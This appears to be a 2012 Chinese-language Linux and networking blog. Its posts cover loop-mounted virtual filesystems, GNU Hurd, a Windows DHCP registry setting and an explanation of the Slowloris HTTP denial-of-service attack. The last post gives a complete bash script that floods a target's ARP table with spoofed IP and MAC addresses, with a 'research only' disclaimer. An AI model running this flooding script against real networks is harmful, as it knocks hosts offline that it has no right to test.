Thursday, March 22, 2012

Virtual file system in Linux

如果你想要在Linux系統中從一個既有的partition去虛擬另一個partition的話,Virtual file system是一個蠻不錯的小技巧。

Step1. 建立一個空檔:
[root@localhost ruckus]# cd /tmp/
[root@localhost tmp]# dd if=/dev/zero of=vs_file bs=1M count=512
512+0 records in
512+0 records out
536870912 bytes (537 MB) copied,0.767225 秒,700 MB/s
Step2. 將空檔格式化成虛擬的檔案系統:
[root@localhost tmp]# mke2fs -j vs_file
mke2fs 1.39 (29-May-2006)
vs_file is not a block special device.
Proceed anyway? (y,n) y
Filesystem label=
OS type: Linux
Block size=1024 (log=0)
Fragment size=1024 (log=0)
131072 inodes, 524288 blocks
26214 blocks (5.00%) reserved for the super user
First data block=1
Maximum filesystem blocks=67633152
64 block groups
8192 blocks per group, 8192 fragments per group
2048 inodes per group
Superblock backups stored on blocks:
8193, 24577, 40961, 57345, 73729, 204801, 221185, 401409

Writing inode tables: done
Creating journal (16384 blocks): done
Writing superblocks and filesystem accounting information: done

This filesystem will be automatically checked every 21 mounts or
180 days, whichever comes first. Use tune2fs -c or -i to override.
Step3. 以一般掛載partition的方法掛載虛擬檔案系統:
[root@localhost tmp]# mount -o loop /tmp/vs_file /mnt/vf/

Step4. 驗證一下:
[root@localhost tmp]# mount | grep vs_file
/tmp/vs_file on /mnt/vf type ext3 (rw,loop=/dev/loop0)
[root@localhost tmp]# cd /mnt/vf/
[root@localhost vf]# ls
lost+found
[root@localhost vf]# touch test
[root@localhost vf]# ls
lost+found test

GNU Hurd kernel

孤陋寡聞,原來GNU原先預期搭載的kernel不是用Linux而是Hurd。
http://www.gnu.org/software/hurd/index.html
http://zh.wikipedia.org/wiki/Hurd
http://www.osnews.com/story/25724/Interview_Richard_Stallman

Monday, March 19, 2012

Configure Windows7 prefer DHCP unicast or broadcast response

預設上Windows7 Home edition是prefer DHCP Server回應的封包採用broadcast的方式,當然這也是可以更改為unicast的,做法很簡單,只要透過register table來更改就可以完成了。

Click Start->regedit->

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{GUID}

GUID這邊指的是對應到的NIC,可用wireshark來幫助查詢。

DhcpConnForceBroadcastFlag (0 or 1)

0 indicate unicast

1 indicate broadcast

Wednesday, March 07, 2012

Low bandwidth HTTP attack: Slowloris

Low bandwidth HTTP attack與傳統的DoS反其道而行,採取的方法是用單一的機器只需少少的頻寬就可以讓HTTP Server癱瘓,其中最著名的就是Slowloris,他的原理簡單的來說是對HTTP Server送不出完全的HTTP request,並且試著讓它保持不被HTTP Server timeout,如此一來HTTP Server可開啟的最大socket數就會滿了,最後導致HTTP Server無法提供服務給其他機器。


請勿以此工具攻擊別人,謝謝。

參考來源:
http://ha.ckers.org/slowloris/
http://news.softpedia.com/news/Web-Servers-in-Danger-from-Low-Bandwidth-HTTP-DoS-114745.shtml
http://en.wikipedia.org/wiki/Slowloris


ARP/MAC address flooding attack

在BT5結合arping測試工具,寫了一個簡單的script來測試目標主機可否hold得住ARP/MAC address flooding attack,script內容如下:
root@bt:~# cat bin/arp_cache.sh
#!/bin/bash

function arp_cache_attack
{
while true;
do
for((i=1;i<=100;i++))
do
mac=$(($RANDOM%10))
number1=$(($RANDOM%254))
number2=$(($RANDOM%254))
number3=$(($RANDOM%254))
number4=$(($RANDOM%254))
arping -S "$number1.$number2.$number3.$number4" -s 00:00:00:00:$mac:$mac 10.10.6.6 -c 1 &
done
sleep 1
kill `ps aux | grep -i arping | grep -v grep | awk -F" " '{ print $2 }'` 1>/dev/null
sync && echo "3" > /proc/sys/vm/drop_caches
echo "re-generate"
done
}

arp_cache_attack

此script每次會產生100筆隨機的假IP與MAC address去嘗試塞滿目標主機(10.10.6.6於以上script中)的arp table。

僅供個人研究,請勿以此script測試或攻擊別人的主機。